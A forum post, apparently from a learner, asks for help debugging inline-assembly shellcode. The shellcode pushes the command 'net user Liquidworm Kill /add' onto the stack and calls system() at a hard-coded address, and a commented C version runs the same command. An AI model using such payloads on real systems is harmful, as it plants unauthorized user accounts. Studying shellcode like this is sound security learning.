今天看教程，但是在调试代码的时候有问题。
#include <windows.h>
#include <winbase.h>

void main(void)
{  
  LoadLibrary("msvcrt.dll");
  __asm
  {
    mov esp,ebp
    push ebp   
    mov ebp,esp
    xor edi,edi
    push edi
    mov ebp,esp
    sub esp,1dh
    mov byte ptr [ebp-1dh],6eh
    mov byte ptr [ebp-1ch],65h
    mov byte ptr [ebp-1bh],74h
    mov byte ptr [ebp-1ah],20h
    mov byte ptr [ebp-19h],75h
    mov byte ptr [ebp-18h],73h
    mov byte ptr [ebp-17h],65h
    mov byte ptr [ebp-16h],72h
    mov byte ptr [ebp-15h],20h
    mov byte ptr [ebp-14h],4ch
    mov byte ptr [ebp-13h],69h
    mov byte ptr [ebp-12h],71h
    mov byte ptr [ebp-11h],75h
    mov byte ptr [ebp-10h],69h
    mov byte ptr [ebp-0fh],64h
    mov byte ptr [ebp-0eh],77h
    mov byte ptr [ebp-0dh],6fh
    mov byte ptr [ebp-0ch],72h
    mov byte ptr [ebp-0bh],6dh
    mov byte ptr [ebp-0ah],20h
    mov byte ptr [ebp-09h],6bh
    mov byte ptr [ebp-08h],69h
    mov byte ptr [ebp-07h],6ch
    mov byte ptr [ebp-06h],6ch
    mov byte ptr [ebp-05h],20h
    mov byte ptr [ebp-04h],2fh
    mov byte ptr [ebp-03h],61h
    mov byte ptr [ebp-02h],64h
    mov byte ptr [ebp-01h],64h
    push esp
    mov eax,0040eeb0h
    call eax
  }
}

/*
#include <windows.h>
void main(void)
{
  LoadLibrary("msvcrt.dll");
  system("net user Liquidworm Kill /add");
}
*/
呵呵，上面的asm代码不知道写的对不对啊。就是构造参数，然后把参数在入栈，最后调用system的地址。但是运行的时候有个错误框啊。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课